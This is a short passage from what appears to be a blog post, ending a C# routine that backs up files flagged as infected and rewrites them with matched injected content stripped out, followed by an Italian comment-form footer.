                Console.WriteLine(++count + " Infected: " + orig);
                file.MoveTo(orig + ".bk");
                File.WriteAllText(orig, re.Replace(content, ""));
            }
        }
    }
}

Other resources:

Lascia un commento

I campi obbligatori sono contrassegnati con *.